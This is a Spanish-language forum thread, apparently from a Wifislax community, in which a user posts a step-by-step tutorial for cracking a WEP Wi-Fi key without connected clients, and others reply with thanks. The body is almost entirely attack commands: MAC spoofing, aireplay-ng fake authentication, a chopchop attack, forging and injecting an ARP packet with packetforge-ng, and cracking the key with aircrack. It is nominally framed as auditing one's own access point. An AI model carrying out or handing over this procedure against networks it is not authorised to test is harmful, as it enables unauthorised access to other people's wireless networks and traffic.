Autor Tema: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes  (Leído 24004 veces)

0 Usuarios y 1 Visitante están viendo este tema.

manel

  • Visitante
Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« en: 21-11-2008, 15:17 (Viernes) »
Buenas,

Lo poco que se de auditoria lo he aprendido en este foro. Si puedo quitar algo de trabajo a los que lo hacen posible , me daré por satisfecho. Gracias por vuestra paciencia   >:( >:( >:(

El tuto está hecho con wifiway 1.0, pero puede servir cualquier versión de wifislax.
Puntualizar que el chop-chop no siempre funciona, pero al forjar nosotros el arp, la inyección es inmediata.

Al lio:

Los drivers de inyección de la bosslan/alfa ya vienen cargados.
Abrimos una consola y tecleamos:

   #iwconfig



Copiamos nuestra iface, en este caso wlan0. Vamos a cambiarle la mac:

   #macchanger -m 00:01:02:03:04:05 wlan0

El sistema responde:



Ponemos la tarjeta en modo monitor:

   #airmon-ng start wlan0

El sistema responde:



Tenemos  todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:

   #airodump-ng wlan0

Veremos una lista de los AP:



Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).

Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.

   #airodump-ng -c [nº_canal] -b [bssid] -w [nombre_archivo] [iface]

En nuestro caso:

   #airodump-ng -c 9 -b 00:02:CF:XX:XX:XX -w captura wlan0

El sistema responde:



Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:

   #aireplay-ng -1 10 -a [bssid] -h [mac_nuestra_tarjeta] [iface]

Nuestro ejemplo:

   #aireplay-ng -1 10 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0

Si todo va bien, tenemos que ver esto:




Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque 4 (chopchop), para conseguir un paquete de datos WEP:

   #aireplay-ng -4 -h [mac_nuestra_tarjeta] [iface]

Sigamos con nuestro ejemplo:

   #aireplay-ng -4 -h 00:01:02:03:04:05 wlan0

Puede tardar más o menos pero nos tiene que salir algo así:




Nos pregunta si queremos utilizar este paquete, le decimos que y.



Nos ha creado dos archivos, uno .cap y otro .xor.
Abriremos el .cap con el tcpdump para ver la ip de nuestro AP.

   #tcpdump -s 0 -n -e -r [archivo.cap]

En nuestro caso:

   #tcpdump -s 0 -n -e -r replay_dec-1117-143113.cap

Nos responde:
   


Vemos la ip del AP: 192.168.1.1 (el 520 no se lo que es), pero siempre serán los cuatro primeros números.
Ahora con el packetforge vamos a forjar un arp para poder inyectarlo:

   #packetforge-ng -0 -a [bssid] -h [mac_nuestra_tarjeta] -k [ip_origen] -l [ip_destino] -y [archivo.xor] -w [nombre_arp_que_creamos]

La ip de origen puede ser cualquiera dentro del rango, la de destino tiene que ser la del AP, y -w sera el arp, ponemos cualquier nombre.En nuestro caso:

  #packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 -k 192.168.1.255 -l 192.168.1.1 -y replay_dec-1117-143113.xor -w arp



Wrote packet to: arp, ya tenemos nuestro arp.
Ahora vamos a inyectarlo con aireplay-ng -2:

  #aireplay-ng -2 -h [mac_nuestra_tarjeta] -r [archivo_arp] [iface]

Nosotros le añadimos la opción -x 1024, para que inyecte 1024 paquetes por segundo, por defecto son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la opción por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los  pocos segundos, relanzaremos el A2 añadiendo la opción -x 300.

    #aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r arp wlan0



Le respondemos que y , y si nada ha fallado ya estamos inyectando.
Nos vamos al airodump y lo comprobamos:



Solo nos queda esperar que suban los #data y lanzar el aircrack. A diferencia del A3, aquí no nos suben los arp, por tanto el ptw no nos sirve. necesitaremos más #data. Sin cerrar nada, abrimos otra consola y lanzamos el aircrack:

  #aircrack [archivo_captura]-01.cap

Nosotros:

   #aircrack captura-01.cap



Suerte y paciencia...





« Última modificación: 29-04-2009, 10:34 (Miércoles) por ChimoC »

ovni00

  • Visitante
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #1 en: 21-11-2008, 15:37 (Viernes) »
lo unico que puedo decir es :

 >:( >:( >:(felicitaciones  gran tuto  >:( >:( >:( >:(

esta todo muy bien detallado


se agradece demasiado >:( >:(



saludos

venturi

  • Visitante
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #2 en: 22-11-2008, 17:20 (Sábado) »
si señor , un tutorial genial , gracias! ;)

manel

  • Visitante
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #3 en: 23-11-2008, 08:46 (Domingo) »
 ;) ;) ;)

Un saludo

*dudux

  • Visitante
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #4 en: 23-11-2008, 13:44 (Domingo) »
muy bueno ....solo un detalle de estos manuales graficos..que cuando caen los servers de hosting de imgenes n6 se entiende na
 >:(

manel

  • Visitante
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #5 en: 23-11-2008, 14:51 (Domingo) »
Buenas:

Los he subido a picassa, espero que duren...

Un saludo

Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17410
  • Misántropo
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #6 en: 23-11-2008, 19:58 (Domingo) »

buena guia >:( >:( >:(

le pongo una chincheta ;)



saludos

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 17710
    • GNU/Linux Wifislax
Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
« Respuesta #7 en: 03-12-2008, 21:04 (Miércoles) »
he mandado esta guia a la seccion de manuales